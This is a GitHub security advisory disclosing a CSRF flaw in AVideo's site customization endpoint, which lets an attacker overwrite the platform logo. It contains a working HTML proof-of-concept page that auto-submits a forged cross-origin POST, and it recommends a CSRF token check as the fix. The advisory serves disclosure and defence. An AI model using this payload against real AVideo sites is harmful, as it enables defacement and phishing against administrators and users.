Skip to content

CSRF on Site Customization Endpoint Enables Logo Overwrite via Base64 File Write

Moderate
DanielnetoDotCom published GHSA-5572-2jgx-fc7c Apr 1, 2026

Software

WWBN/AVideo

Affected versions

<= 26.0

Patched versions

None

Description

Severity: Medium
CWE: CWE-352 (Cross-Site Request Forgery)

Summary

The site customization endpoint at admin/customize_settings_nativeUpdate.json.php lacks CSRF token validation and writes uploaded logo files to disk before the ORM's domain-based security check executes. Combined with SameSite=None cookie policy, a cross-origin POST can overwrite the platform's logo with attacker-controlled content.

Details

The endpoint admin/customize_settings_nativeUpdate.json.php processes logo uploads via base64-encoded POST data:

$fileData = base64DataToImage($_POST['logoImgBase64']);
$bytes = file_put_contents($global['systemRootPath'] . $photoURL, $fileData);

The file_put_contents() call executes before the ORM save() call. The ORM includes a Referer/Origin domain check that will reject the subsequent configuration title change from a cross-origin request, but by that point the file has already been written to disk. The logo overwrite succeeds even though the ORM blocks other changes.

Because AVideo sets SameSite=None on session cookies, the admin's authenticated session is included in cross-origin POST requests. No CSRF token is required by the endpoint.

Proof of Concept

Host the following HTML on an attacker-controlled domain. When an authenticated admin visits the page, their site logo is replaced.

<!DOCTYPE html>
<html>
<head><title>CSRF Logo Overwrite</title></head>
<body>
<h1>Loading...</h1>
<script>
// Minimal 1x1 red pixel PNG encoded as base64 data URI
var maliciousLogo = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z8BQDwADhQGAWjR9awAAAABJRU5ErkJggg==";

var form = document.createElement("form");
form.method = "POST";
form.action = "https://your-avideo-instance.com/admin/customize_settings_nativeUpdate.json.php";

var input = document.createElement("input");
input.type = "hidden";
input.name = "logoImgBase64";
input.value = maliciousLogo;
form.appendChild(input);

document.body.appendChild(form);
form.submit();
</script>
</body>
</html>

Impact

  • Platform logo replaced with attacker-controlled image (defacement)
  • Phishing potential: logo can be replaced with a misleading image containing fraudulent instructions
  • The file write is irreversible without manual admin intervention
  • ORM security check provides a false sense of protection since the file write occurs first

Recommended Fix

Add CSRF token validation at admin/customize_settings_nativeUpdate.json.php:10, before processing any POST data or file writes:

// admin/customize_settings_nativeUpdate.json.php:10
if (!isGlobalTokenValid()) {
    die('{"error":"Invalid CSRF token"}');
}

This must be placed before the base64DataToImage() and file_put_contents() calls to prevent the file write from executing on forged requests.

Found by aisafe.io

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE ID

CVE-2026-35180

Weaknesses

Cross-Site Request Forgery (CSRF)

The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. Learn more on MITRE.

Credits